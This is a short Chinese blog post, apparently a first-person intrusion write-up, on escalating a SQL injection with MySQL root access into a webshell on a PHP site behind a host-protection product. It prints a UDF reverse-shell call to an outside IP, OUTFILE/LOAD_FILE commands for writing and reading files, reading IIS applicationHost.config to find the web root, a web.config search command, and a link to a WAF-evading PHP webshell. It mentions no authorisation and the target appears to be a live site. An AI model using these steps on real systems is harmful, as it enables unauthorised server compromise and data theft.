记一次曲折的获取网站路径

          网站php mysql 存在sql注入root权限 跑库的时候表是非常多常见的admin member user manage 都看完了 没有找到需要的数据 只能一个一个重新找  最后发现存在管理员的表的是一个不显眼的表里面，登录到后台发现后台只验证账号不验证密码。

        本来想这后台的权限应该很大，扎心了。 编辑器都是不能利用的正常上传个图片都无法上传，最后发现很多栏目都是有问题的 IE6也是如此 只有一个可以正常上传图片的 还是无法利用的那种。起初我还在纳闷这个网站的运营者是怎么每天在更新的。后台就这样告一段落。数据库root权限试了下支持外链，想着这下数据库直接可以getshell了。看到了数据库的安装路径想着网站的路径的也在PHPWEB 的这个路径下 

select backshell("192.168.106.137",2010);    mysql反弹端口

SELECT '1111' INTO OUTFILE 'D:\\PHPWEB\1.txt'   //使用outfile 进行写文件

SELECT LOAD_FILE('D:\\PHPWEB\\1.txt')                    //使用load_file读取文件

       正常可读写，尝试让网站与数据库交互时报错爆出路径，试了好一会无果，然后根据尝试 wwwroot 、www、webroot 、web、网站域名、等等都没有猜到！尝试在数据库写马到网站里让其爆错，写的PHP文件都是被注释掉了！接下来转换思路寻找它使用的是什么集成环境 一般不是集成的都是安装在C盘的。根据经验发现他使用的是护卫神，护卫神自带phpmyadmin是对外开放的 IP:999发现不行人为关掉了。其实在此之前我在纳闷root权限 sqlmap 为什么 os-cmd 执行不成呢，原来是被拦截了！！！继续转换思路WEB服务器是IIS7.5 报错信息关掉了。那就去找IIS 的日志 ，试了好多都没有读出来有用的东西，file://D:/   这个路径真没毛病 。。。。  file 调用 本地 还是中文 目录 中文就放弃了 。。。继续寻找其他的目录    

   C:\Windows\System32\inetsrv\config\applicationHost.config

        在这个路径下找到有用的信息 物理路径 D:\sscw98   其他目录都是中文目录，这下总可以getshell了吧    

       去数据库执行了 一下 可以正常读写。尝试写了个php文件发现 无法显示 有护卫神 上免杀马

SELECT '123' INTO OUTFILE 'D:\\sscw98\1.txt'   

SELECT LOAD_FILE('D:\\sscw98\\1.txt')

https://github.com/testsecer/WebShell/blob/master/php/%E6%97%A0%E7%89%B9%E5%BE%81%E5%85%8D%E6%9D%80%E6%89%80%E6%9C%89waf%E4%B8%80%E5%8F%A5%E8%AF%9D.php

    成功getshell！！！ 找这个物理路径费了好大劲。

查找包含 web.config 文件

for /r c: %i in (web.config) do @echo %i

参考链接 https://www.jb51.net/article/112583.htm